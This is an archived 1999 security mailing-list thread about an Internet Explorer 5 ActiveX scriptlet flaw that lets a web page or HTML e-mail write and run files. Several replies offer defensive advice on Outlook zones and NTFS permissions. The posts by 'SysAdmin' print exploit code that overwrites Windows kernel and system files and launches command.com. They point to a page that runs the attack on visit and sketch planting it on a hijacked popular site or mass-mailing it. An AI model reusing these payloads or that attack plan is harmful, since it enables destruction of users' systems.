Re: IE5 allows executing programs

1999-09-09 Thread David LeBlanc

A couple of people have sent me mail asking how to set Outlook 2000 such
that mail comes in under the 'Restricted Sites' zone.  Here's how:

select Tools menu, Options item
select security tab

The area you want is in the middle of the page in the section marked
'Secure Content'.  Default setting is 'Internet', which isn't too bad, but
'Restricted Sites' is better.  One good reason for this is that most people
don't have any sites in 'Restricted Sites' list, so anything you set in
that zone won't screw up your normal web browsing.  Another good reason is
that the default security settings are better for this zone.  Even with the
'High Security' settings, I like to go in and tweak the following:

Script ActiveX Controls Marked Safe for Scripting - ActiveX seems to be
disabled in other places, but go ahead and set this to prompt or disable
just in case there is some exception I'm not aware of.

Microsoft VM Java Permissions - the sandbox is set to high, but given that
every Java VM out there has had a breach or another, and you don't know
when the next will show up, I disable this.  Who needs dancing bunnies in
their e-mail anyway?

Scripting, Active Scripting - I set this to disable.

I haven't noticed any legitimate e-mail breaking, so I think these changes
can be made without impacting anything you or your users might want.
Please test this on your own before doing this to lots of machines.  YMMV.
The above is what I personally do, and may or may not reflect the views of
my employer or anyone else.

I'm reasonably sure that these settings disallow all of the e-mail attacks
(attachments notwithstanding) that I'm aware of, so this should help make
your system more secure against not only known attacks, but whole classes
of undiscovered issues.

I'm not sure what the variants of Outlook allow in this respect - I think
the same thing was in Outlook 97, but I don't have it installed so I can't
go check.  Not sure about Outlook Express, and I don't know how Eudora 4.x
works with this, either.


David LeBlanc
[EMAIL PROTECTED]



Re: IE5 allows executing programs

1999-09-09 Thread Kragen Sitaker

David LeBlanc writes:
 YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE.  Period.  End of story.
 What you do with that code is up to you.  There is no need to delve into
 the details of just how you steal the lunch money from the end users.

Well, it should be noted that there are things you can do with that
code that are a lot worse than deleting all of somebody's files.
Password theft, credit-card theft, wholesale identity theft,
distributed computation (need to crack a DES message in a day?),
embezzling money if they use CheckFree, blackmail, and corporate
espionage come to mind.

This sort of thing will happen, sooner or later, on a wide scale --
unless we can do something about it soon.

 The other
 thing is that the default install for NT (especially on HP's) is FAT,

 Wrong.  That could be how that manufacturer sets up _some_ of their
 machines, but it isn't default for NT install.

Micron and Intergraph also install NT on FAT when they ship it to you.
Micron hassles you if you switch to NTFS and then call them for
support; they wanted my co-worker to reinstall NT on FAT and then call
them back if he was still having trouble.  The NT install program gives
you the option of FAT or NTFS; I don't remember which it picks by default.

If I recall correctly (I've only installed NT five or six times), if
you later convert to NTFS (without reinstalling), you carry over the
FAT permissions: "Full Control" for "All Users" on everything.

 Most people who don't know what NTFS is are still using it if they are
 running NT.

Are there manufacturers that ship NT with NTFS by default?

--
[EMAIL PROTECTED]   Kragen Sitaker http://www.pobox.com/~kragen/
Tue Aug 24 1999
76 days until the Internet stock bubble bursts on Monday, 1999-11-08.
URL:http://www.pobox.com/~kragen/bubble.html



Re: IE5 allows executing programs

1999-09-09 Thread Jesper M. Johansson

 The other
 thing is that the default install for NT (especially on HP's) is FAT,

 Wrong.  That could be how that manufacturer sets up _some_ of their
 machines, but it isn't default for NT install.

Micron and Intergraph also install NT on FAT when they ship it to you.

I can't think of many manufacturers that don't, and the majority of them
don't like it if you convert it. Gateway, for example, refuses completely to
support any aspect of NT running on NTFS on their systems. They even went so
far as to try to void the warranty on one system we bought from them because
it was running NTFS.

The problem with this area, and what makes so many systems vulnerable, is
that OEMs refuse to ship their systems with NTFS partitions. They won't do
it because it is too difficult for them to walk someone through a repair if
they can't get to the boot partition with a dos disk. Since most people
don't know the difference between NTFS and FAT (or a hole in the ground for
that matter) most partitions never get converted, leaving these systems open
to holes like this one. This is a big problem. Hopefully, the ER boot option
in Win2K will solve some of this, since it enables OEMs to easily walk
people through repairs.

If I recall correctly (I've only installed NT five or six times), if
you later convert to NTFS (without reinstalling), you carry over the
FAT permissions: "Full Control" for "All Users" on everything.

FIXACLS.EXE (NTResKit Supplement 2) will fix that. See Q157963 for more
details.

 Most people who don't know what NTFS is are still using it if they are
 running NT.

Are there manufacturers that ship NT with NTFS by default?

Only on servers AFAIK. Dell ships its workstations with a menu item for
"converting C to NTFS," which is just a shortcut to convert. That's the best
I've seen so far.


Jesper M. Johansson
[EMAIL PROTECTED]
Editor, SANS NT Digest
MCSE , MCP + I



Re: IE5 allows executing programs

1999-09-09 Thread SysAdmin

Okay,

I added a link to http://www.sassproductions.com/hacked.htm that allows
you to test the exploit against a specific file. Specifically you need to
copy Reg Edit to the program files folder and give it a whirl. As always, if
you can't figure it out then View Source.




Over and out,
Seth Georgion



Re: IE5 allows executing programs

1999-09-09 Thread J MacCraw

Does this writing to an EXE bypass Anti-Virus protection against programs
that write to EXE's?

How about a less damaging example that writes to say "C:\temp\example.exe"
so we can see what it does safely?


At 21:16 8/30/1999 -0400, SysAdmin Wrote:
snip

ANY Windows 98 file can be overwritten. Period. If you try and manually
pasting over or destroying the file you will be denied, however Active X can
help where you can't. In fact, ironically, after it's been corrupted you
cannot fix it because you are denied from touching it! If Windows 98 is
restarted or crashed (hint, forced to crash), then it will fail start up
with a Fatal Exception, you can only recover from DOS by restoring the file.
I would like to note, for the record, that the vast majority of home users
who will never know about the patch to this file or know what Active X even
is are not in possession of 98 install disks. Rather they are in possession
of a disk that restores the computer to factory original. Despite David
LeBlanc et al. assurance that we could just disable Active X I'm discussing
it because you know your poor parents are NEVER going to, how would they
understand the instructions? And, of course, what average user could EVER
recover from this sort of damage?

snip

The link is http://www.sassproductions.com/hacked.htm

snip
Joshua MacCraw
http://www.warpmedia.net
mailto:[EMAIL PROTECTED]



Re: IE5 allows executing programs

1999-09-09 Thread Paul L Schmehl

Outlook Express 5 allows setting the Security Zones in the exact same way:
Tools/Options/Security.  So does Outlook 98.

I don't think previous versions allowed it.

--On 9/7/1999, 11:23 AM -0700 David LeBlanc [EMAIL PROTECTED] wrote:

 I'm not sure what the variants of Outlook allow in this respect - I think
 the same thing was in Outlook 97, but I don't have it installed so I can't
 go check.  Not sure about Outlook Express, and I don't know how Eudora 4.x
 works with this, either.

Paul L. Schmehl, [EMAIL PROTECTED]
Technical Support Services Manager
The University of Texas at Dallas



Re: IE5 allows executing programs

1999-09-07 Thread Brad Griffin

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Hi all.
I recently posted extracts from George Guninski's original post about
this issue and an extract from Sysadmin's post (both with the code
samples) in an e-mail to another list to inform some of 'the masses'.
I received a personal e-mail from one of the people on that list
describing the following:

" I use Eudora Pro and have IE 5 as the default mail viewer (as is the
default Install) and you crashed Eudora (NT not logged in as
Administrator). I had to disable IE 5 as the default viewer to see the
mail..."
I assume this would have been caused by the mail reader attempting to
execute all four fragments of code.


Date sent:  Wed, 1 Sep 1999 09:59:45 -0700
Send reply to:  David LeBlanc [EMAIL PROTECTED]
From:   David LeBlanc [EMAIL PROTECTED]
Subject:            Re: IE5 allows executing programs
Originally to:  SysAdmin [EMAIL PROTECTED], 
[EMAIL PROTECTED]
To: [EMAIL PROTECTED]

 Now for the detailed response...

 At 09:16 PM 8/30/99 -0400, SysAdmin wrote:

 ANY Windows 98 file can be overwritten.

*snip*
 YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE.  Period.  End of story.
 What you do with that code is up to you.  There is no need to delve into
 the details of just how you steal the lunch money from the end users.
*even biggersnip*

-BEGIN PGP SIGNATURE-
Version: PGP 6.5.1 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html

iQA/AwUBN86VbgiK90dv14WBEQJ1ggCeOsY1DUXNIwKMaVgTOxHnMYSlg5gAoL1z
Bns0JeGvBg6AOy5x3HkOIoO0
=IOcI
-END PGP SIGNATURE-
Brad Griffin
2nd yr B.Infotech
CQU Rockhampton
Australia
(Translation: Does not require sleep)

http://www.cai.com/antivirus/personal/
FREE anti-virus software
http://www.avp.com
Not free, but about the best around
*



Re: IE5 allows executing programs

1999-09-02 Thread Jim Frost

 Onto Windows NT, yes, David was correct, you can bar write access in NTFS
 and it cannot be written to. I have not invested any interest in this but I
 assume there is at least one critical system file (possibly security file)
 that he would miss and might be overwritten.

It's actually quite trivial to lock down an NT box against non-administrator
system changes.  The server variant can (or could -- I haven't installed it in
awhile) optionally be set up that way out of the box -- but only if you chose
the options right during installation.  No application installers that I'm
aware of have similar options, however, so you must manually secure anything
you add.

I wrote a simple tool that would tighten security on an NT system a few years
ago as part of a foray into the NT security API -- it was not difficult at all.
In fact, it was interesting to find out which files the system didn't like to
have read-only: back in NT 3.5 the MS-DOS ROM file was written by CMD.EXE when
it shut down!  Very odd.  I think they fixed that in NT4.

 In fact the default for the
 Administrator or one with Administrator privileges is Full Access.

Yes.  It never ceases to amaze me that Microsoft sets it up this way by
default -- as well as not having any kind of tool in-the-box for tightening up
security.  It's a royal pain to do it manually.  Perhaps even worse they appear
to have no best-practices for secure application installations so even if they
put this stuff in there it will be years before vendors start doing the right
thing.

 The other thing to remember is that in
 very small domains the average user is generally administrator

Even in domains of tens of machines (in my experience).  NT is hugely
problematic in that an awful lot of stuff can't be done unless you're an
administrator -- and for sites that don't have enough administrator coverage
(which seems to be most of them) it's common to just make everyone an
administrator so they can perform typical system administration tasks
themselves.

 The other
 thing is that the default install for NT (especially on HP's) is FAT, which
 does not allow specific file security.

True, but conversion is just one command and a reboot away.

So: I'll heartily agree with you that it's not hard to write an exploit that
subverts your typical NT system, but we've seen very few to date (only one that
I remember, but I haven't paid that much attention of late since I no longer
use NT for anything critical) that can do so if you take a few simple
precautions in setting up your system.

jim



Re: IE5 allows executing programs

1999-09-02 Thread David LeBlanc

Now for the detailed response...

At 09:16 PM 8/30/99 -0400, SysAdmin wrote:

ANY Windows 98 file can be overwritten.

Sure - the OS has no concept whatsoever of securing itself from the end
user. DoSing Win98 with an attack like this is trivial.  However, it is
still a cheap, lame attack on end-users that really doesn't gain you
anything and gives people a bad day.  Maybe that's your idea of fun, but it
isn't mine.  May as well send them an executable that fdisks the hard
drive.  Probably work nearly as often, and do a lot more damage.  Put
dancing bunnies in the .exe.  People love dancing bunnies.

I would like to note, for the record, that the vast majority of home users

For the record, this hole is a serious one.  I don't downplay the
seriousness of the issue.  I can make it do a lot more than you're thinking
about here, and a number of the obstacles you mention can be overcome
trivially.

YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE.  Period.  End of story.
What you do with that code is up to you.  There is no need to delve into
the details of just how you steal the lunch money from the end users.

Despite David
LeBlanc et al. assurance that we could just disable Active X I'm discussing
it because you know your poor parents are NEVER going to,

Since this is a security list, people here care about security.  One of the
things we do here is discuss work-arounds.  Most UNIX admins don't install
patches either.  Most _people_ don't install patches.  I've broken into
systems that had holes that were 10 years old.  Maybe some of the people
will read this, and say "Damn, he's right", then go click on several
buttons and poof - they aren't vulnerable any more.  Then if some
sociopathic moron DOES go off and create an e-mail virus with this as the
payload, maybe just maybe SOMEONE won't be hit by it.  I try to offer
helpful suggestions as to how to make things BETTER, given that between the
fact that security holes happen, end users are usually clueless, and
sysadmins aren't much better, most networks are a mess.  The ONLY chance
you've got against this sort of thing are automated tools to check LOTS of
systems at once so that you know where the problems are.  I deal with a
network that approaches 100,000 systems, so I know something about scale.

No, most people won't go turn it off.  They'll accept the defaults,
whatever they are.  Somewhat more of them will read about this in the news
and go get the patch.

And, of course, what average user could EVER
recover from this sort of damage?

They'll go get a friend who will help them reinstall, or go pay CompUSA or
something.  They might not ever figure out what got them.  Too bad you
can't get them to take a snapshot using their web cam and send it to you so
that you can see the misery on their face.

Onto Windows NT, yes, David was correct, you can bar write access in NTFS
and it cannot be written to. I have not invested any interest in this but I
assume there is at least one critical system file (possibly security file)
that he would miss and might be overwritten.

Maybe you should.  If you're not running as admin, there isn't much you can
torch off, and certainly not the SAM file.

In fact the default for the
Administrator or one with Administrator privileges is Full Access. Of course
this would allow the exploit to run. The other thing to remember is that in
very small domains the average user is generally administrator

This is true.  Far too many people run as admin.  Fortunately, this should
get better in Win2k - several changes to encourage people to run as 
admin, and make life easier if you want to change user context to go do
something.

and remember
this exploit can be E-Mailed!!! or mass-mailed! get my drift?

I understand that.  E-mail readers that display HTML aren't a really great
idea in my personal opinion, and I'm not using one right now.  However, I
would encourage people to set their mail reader to assume that e-mail is a
hostile site, and make the settings accordingly.  Again, just a vain hope
that maybe a few people might be more secure.  IF someone takes my
suggestion and tweaks their settings, there are whole classes of attacks
that will no longer get them.

And if you do mass mail something like that, you'll cost people a LOT of
money, and the feds will make a good effort to hunt you down and put you in
jail.  Jail is not a fun place.

The other
thing is that the default install for NT (especially on HP's) is FAT,

Wrong.  That could be how that manufacturer sets up _some_ of their
machines, but it isn't default for NT install.

which
does not allow specific file security. Anyone know a dual-booter? Maybe
someone who doesn't even know what NTFS is? I thought so.

Most people who don't know what NTFS is are still using it if they are
running NT.

Not bad 'huh?

Actually, it contains flaws which are trivially overcome that make it break
under a number of conditions.  Though considering what this code does, not
working could be 

Re: IE5 allows executing programs

1999-09-01 Thread David LeBlanc

At 04:24 PM 8/29/99 -0400, SysAdmin wrote:

Now watch as I modify this to destroy Regedit 32

That's only if the user has write permissions to regedt32.  In terms of
causing the OS to crash, NT won't let you overwrite system binaries that it
is using at the moment.  Something else smart to do (at least under win2k)
is to use RunAs to run your browser under a lower privileged user than normal.

snip really scary horror story - too bad Godzilla isn't in it

Has anyone figure out if an arbitrary binary could be executed?

George made that pretty clear.  I'll leave the details as an exercise to
the reader.  Safest thing to do is get the patch and set your system to
prompt you when something wants to script one of your ActiveX controls.
The problem here isn't so much ActiveX (which is really just equivalent to
a plug-in), but the fact that it can be scripted, and that the control
itself is responsible for announcing whether it is safe for scripting.

Also, I understand outlook executes this code immediatley, is
it possible that this same code could cause someone's system to crash merely
by opening the E-Mail?

This depends on how you have Outlook set up.  Outlook 2000 allows you to
set your e-mail viewing zone to anything you like.  Mine is set to
Untrusted Zone, which has nearly everything set to either off or prompt.
BTW, even default Untrusted Zone isn't untrusted enough for me, so a review
of what the actual settings are is probably in order.  I also like to set
all sorts of stuff to 'prompt' so that it doesn't ignore potential attacks.
 Then I can take whatever action seems appropriate toward the site that is
doing rude things 8-)

Maybe it is just me, but DoS-ing end-users really seems about on par with
beating up elementary school kids for their lunch money.


David LeBlanc
[EMAIL PROTECTED]



Re: IE5 allows executing programs

1999-09-01 Thread SysAdmin

After further research into David LeBlanc's debunking of my posting I have
discovered (rather remembered) that ntoskrnl is loaded from the system
folder into memory where it is accessed exclusively, this frees it from the
write restriction due to system use. I think he must administrate Windows 98
domains which do not let you modify the Kernel (called Krnl386.exe) I'm
sorry I have taken so long to respond to the criticism but I felt that I,
unlike others, should do my research first. Let me summarize the current
understanding

ANY Windows 98 file can be overwritten. Period. If you try and manually
pasting over or destroying the file you will be denied, however Active X can
help where you can't. In fact, ironically, after it's been corrupted you
cannot fix it because you are denied from touching it! If Windows 98 is
restarted or crashed (hint, forced to crash), then it will fail start up
with a Fatal Exception, you can only recover from DOS by restoring the file.
I would like to note, for the record, that the vast majority of home users
who will never know about the patch to this file or know what Active X even
is are not in possession of 98 install disks. Rather they are in possession
of a disk that restores the computer to factory original. Despite David
LeBlanc et al. assurance that we could just disable Active X I'm discussing
it because you know your poor parents are NEVER going to, how would they
understand the instructions? And, of course, what average user could EVER
recover from this sort of damage?

Onto Windows NT, yes, David was correct, you can bar write access in NTFS
and it cannot be written to. I have not invested any interest in this but I
assume there is at least one critical system file (possibly security file)
that he would miss and might be overwritten. In fact the default for the
Administrator or one with Administrator privileges is Full Access. Of course
this would allow the exploit to run. The other thing to remember is that in
very small domains the average user is generally administrator and remember
this exploit can be E-Mailed!!! or mass-mailed! get my drift? The other
thing is that the default install for NT (especially on HP's) is FAT, which
does not allow specific file security. Anyone know a dual-booter? Maybe
someone who doesn't even know what NTFS is? I thought so.

Well, I must admit I'm tired of the down playing and guessing. I have
decided to put the ball in play. I have posted a web page, on my domain mind
you, that contains the Hacks for both OS's. Understand that if you visit
them the hack will run and when it runs, if you're not prepared, you will be
very unhappy. I have included the code here so that you can see what
happens.


The link is http://www.sassproductions.com/hacked.htm

The code for the 98 exploit is

 p
object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
/objectscript
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script

/p

See how simply that was adapted? I polished it not-at-all so you can see the
minimal changes. At this point you would be automatically transferred to a
second web page that would contain the following code.

html

head
titleSelf Destruct /title
/head

body
form method="POST"

table
tr
td width="20%"input type="text" name="State" size=""
maxlength="" value=""/td
/tr
/table

/form
/body
/html

Recognize that? It's the code to DoS IE5. Most simple users would restart at
this point, never notice a web page change, and lose their Kernel.

Here's the NT code

p
object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14"
/object
script
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script
/p

Not bad 'huh? This exploit needs to be realized for what it is, a very
dangerous problem. If someone mass-mailed it to my domain I wouldn't be able
to deal with bouncing between three offices helping EVERY single user.

If someone has a problem with my post feel free to mention it.

Seth Georgion



Re: IE5 allows executing programs

1999-08-30 Thread SysAdmin

Okay, I haven't seen any interesting observations yet as to the value of
this exploit or the potential damage it contains. This exploit allows for
the OVERWRITING of any application you choose, WITHOUT the system objecting.
I haven't tested it against anything specific yet, except for a trial run
against Regedit. The key is to select a specific path in which a known file
resides, such as C:\\winnt\system32 and then you give the .hta file the name
of the file you want overwritten. Here's the code originally included;


object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"

/object
SCRIPT
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/SCRIPT
/object

If you wanted this to run against an NT machine then,

object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
/objectscript
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\All Users\\Start
Menu\\Programs\\Startup\\guninski.hta";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script


For all those arguing about figuring out which user it should be addressed
to, the answer is to "All Users"

Now watch as I modify this to destroy Regedit 32


object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
/objectscript
scr.Reset();
scr.Path="C:\\WINNT\\System32\\regedt32.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script


As you can see the simple malicious damage is unprecedented, good luck
trying to figure out what's happened when your computers crashed,
permanently. Now let me give you a simple scenario for a real-world example.
Let's say a Cracker, we'll call him Ahab, decides to take over ABC or
Symantec's web page, not that difficult to imagine. Without ever breaking
the firewall, all he has to do is modify the web page. Now usually they
detect the obscene message within minutes taking it offline, imagine though
if Ahab just modified the source, he could include in it both Active X
exploits, for NT and 98, in addition he could add to the source an
insturction to change to another web page in 5 seconds, a page he's added to
InetPub. This new page would include the even more recent exploit that
crashes IE5 with a form field overflow. Imagine how long it would take for
anyone to realize that the web page had been hacked, their computers would
freeze everytime they went there for no apparent reason (the new exploit
doesn't display the page that froze your browser only the page before) All
of those home users, the thousands of hits a day they'd be getting, would
simply connect to the site, get their system Kernal overwritten and have
their browser crashed, forcing a restart for the home user. Does everyone
see the potential damage here?

Has anyone figure out if an arbitrary binary could be executed? Such as Net
Cat or BO2K? Also, I understand outlook executes this code immediatley, is
it possible that this same code could cause someone's system to crash merely
by opening the E-Mail?

Seth Georgion